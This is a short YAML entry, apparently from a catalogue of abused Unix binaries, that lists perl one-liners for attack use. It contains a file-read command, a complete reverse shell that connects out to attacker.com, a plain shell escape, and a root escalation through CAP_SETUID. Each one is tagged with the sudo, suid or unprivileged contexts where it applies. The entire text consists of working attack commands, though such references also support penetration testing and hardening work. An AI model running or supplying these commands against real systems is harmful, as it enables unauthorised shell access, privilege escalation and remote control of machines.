---
functions:
  file-read:
  - code: |-
      perl -ne print /path/to/input-file
    contexts:
      sudo:
      suid:
      unprivileged:
  reverse-shell:
  - code: |-
      perl -e 'use Socket;$i="attacker.com";$p=12345;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
    contexts:
      sudo:
      unprivileged:
    listener: tcp-server
    tty: false
  shell:
  - code: |-
      perl -e 'exec "/bin/sh"'
    contexts:
      capabilities:
        code: |-
          perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh"'
        list:
        - CAP_SETUID
      sudo:
      unprivileged:
...
